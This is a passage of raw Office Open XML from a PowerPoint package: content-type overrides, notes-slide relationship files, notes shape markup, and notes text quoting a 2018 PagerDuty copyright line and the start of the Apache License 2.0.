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4.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5.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/notesSlides/notesSlide11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/media/image6.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7.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8.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9.jpeg" ContentType="image/jpeg"/>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media/image10.jpeg" ContentType="image/jpeg"/>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media/image11.jpeg" ContentType="image/jpeg"/>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media/image12.jpeg" ContentType="image/jpeg"/>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media/image13.jpeg" ContentType="image/jpeg"/>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media/image14.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/notesSlides/notesSlide70.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/media/image15.jpeg" ContentType="image/jpeg"/>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media/image16.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/notesSlides/notesSlide76.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide77.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/media/image17.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/notesSlides/notesSlide78.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide79.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/media/image18.jpeg" ContentType="image/jpeg"/>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media/image19.jpeg" ContentType="image/jpeg"/>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media/image20.jpeg" ContentType="image/jpeg"/>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media/image21.jpeg" ContentType="image/jpeg"/>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media/image22.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/notesSlides/notesSlide108.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide109.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/media/image23.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/notesSlides/notesSlide110.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/media/image24.jpeg" ContentType="image/jpeg"/>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media/image25.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/notesSlides/notesSlide120.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/media/image26.jpeg" ContentType="image/jpeg"/>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media/image27.jpeg" ContentType="image/jpeg"/>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media/image28.jpeg" ContentType="image/jpeg"/>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media/image29.jpeg" ContentType="image/jpeg"/>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media/image30.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/notesSlides/notesSlide172.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/media/image31.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/notesSlides/notesSlide173.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/media/image32.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/notesSlides/notesSlide174.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide175.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/media/image33.jpeg" ContentType="image/jpeg"/>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media/image34.jpeg" ContentType="image/jpeg"/>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media/image35.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/notesSlides/notesSlide197.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/media/image36.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image37.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image38.jpeg" ContentType="image/jpeg"/>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 Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide184.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide185.xml"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide186.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide187.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide188.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide189.xml"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide190.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide191.xml"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide192.xml"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide193.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide194.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide195.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide196.xml"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide197.xml"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide198.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide199.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20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5" name="Shape 135"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Shape 13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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide126.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide127.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s>

</file>

<file path=ppt/notesSlides/_rels/notesSlide12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129.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0.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide131.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide132.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide133.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide134.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide135.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide136.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide137.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide138.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide139.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0.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide141.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide14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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide14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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide144.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide145.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide146.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide147.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide148.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide149.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<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0.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide151.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide152.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide152.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide153.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide153.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide154.xml.rels><?xml version="1.0" encoding="UTF-8"?>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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide155.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide155.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide156.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide156.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide157.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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide158.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide158.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide159.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide15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0.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide160.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide161.xml.rels><?xml version="1.0" encoding="UTF-8"?>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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide162.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<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Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide163.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide163.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide164.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide164.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide165.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide165.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide166.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide166.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide167.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide167.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide168.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide168.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide169.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide16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0.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide170.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide171.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide171.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide172.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide172.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide173.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide173.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide174.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide174.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide175.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide175.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide176.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide176.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide177.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide177.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide178.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide178.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide179.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide17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0.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide180.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide181.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide181.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide182.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide182.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide183.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide183.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide184.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide184.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide185.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide185.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide186.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide186.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide187.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide187.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide188.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide188.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide189.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide18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0.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide190.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide191.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide191.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide192.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide192.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide193.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide193.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide194.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide194.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide195.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide195.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide196.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide196.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide197.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide197.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide198.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide198.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide199.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide19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00.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide20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  Copyright 2018 PagerDuty, Inc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>                                 Apache License</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>                           Version 2.0, January 2004</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>                        http://www.apache.org/licenses/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   1. Definitions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      "License" shall mean the terms and conditions for use, reproduction,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      and distribution as defined by Sections 1 through 9 of this document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      "Licensor" shall mean the copyright owner or entity authorized by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      the copyright owner that is granting the License.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      "Legal Entity" shall mean the union of the acting entity and all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
